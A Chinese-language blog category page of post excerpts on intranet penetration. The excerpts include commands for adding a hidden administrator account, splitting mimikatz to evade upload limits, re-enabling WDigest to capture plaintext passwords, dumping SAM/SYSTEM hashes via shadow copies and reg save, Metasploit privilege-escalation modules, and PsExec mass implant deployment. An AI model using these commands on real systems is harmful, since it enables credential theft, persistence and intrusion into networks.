内网 - 随笔分类 - Shadown-PQ

免杀/权限维持------API添加用户

摘要：原文 https://mp.weixin.qq.com/s/5Iitrfst3TXd8sRCfq6sHw python2，默认添加Test1234，密码Test@1234，组Administrators。 import ctypes from ctypes import wintypes from 阅读全文

posted @ 2021-07-18 22:27 Shadown-PQ 阅读(318) 评论(0) 推荐(0)

内网Tip------上传限制大小

摘要：LInux中使用split 以 500 K 大小分割 mimikatz.exe 文件,文件分为几个500k大小的小文件。 split -b 500k mimikatz.exe test 合并分割文件为 mimikatz.exe cat testa* > test.exe # 适用于 Linux、Ma 阅读全文

posted @ 2021-06-30 17:54 Shadown-PQ 阅读(66) 评论(0) 推荐(0)

内网------高权限密码抓取

摘要：微软发布了KB2871997补丁，⽤来关闭Win7和08的Wdigest功能，同时Server2012版以上默认关闭该功能，但是仍然可以通过修改注册表的⽅法来⼿动开启。需要修改注册表。 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityPr 阅读全文

posted @ 2021-06-30 14:40 Shadown-PQ 阅读(73) 评论(0) 推荐(0)

内网------离线获取HASH

摘要：1、利用卷影拷贝方式获取目标SYSTEM，SECURITY，SAM文件本地离线解密 wmic shadowcopy call create Volume='C:\' 2、powershell 操作注册表导出文件 powershell reg save hklm\system SYSTEM power 阅读全文

posted @ 2021-06-27 14:02 Shadown-PQ 阅读(314) 评论(0) 推荐(0)

提权------MSF提权

摘要：getsystem meterpreter> getsystem BypassUAC use exploit/windows/local/bypassuac use exploit/windows/local/bypassuac_injection use windows/local/bypassu 阅读全文

posted @ 2021-06-18 14:33 Shadown-PQ 阅读(164) 评论(0) 推荐(0)

内网------不出网批量上线

摘要：先将可出网的一台机设置中转生成马子，把马子和PsExec传到出网的机子上，之后用PsExec执行命令 PsExec.exe -accepteula \\192.168.241.171,192.168.241.172 -u Administrator -p xxxxx -d -c C:\Window 阅读全文

posted @ 2021-06-18 13:51 Shadown-PQ 阅读(157) 评论(0) 推荐(0)

B&&W

随笔分类 - 内网

公告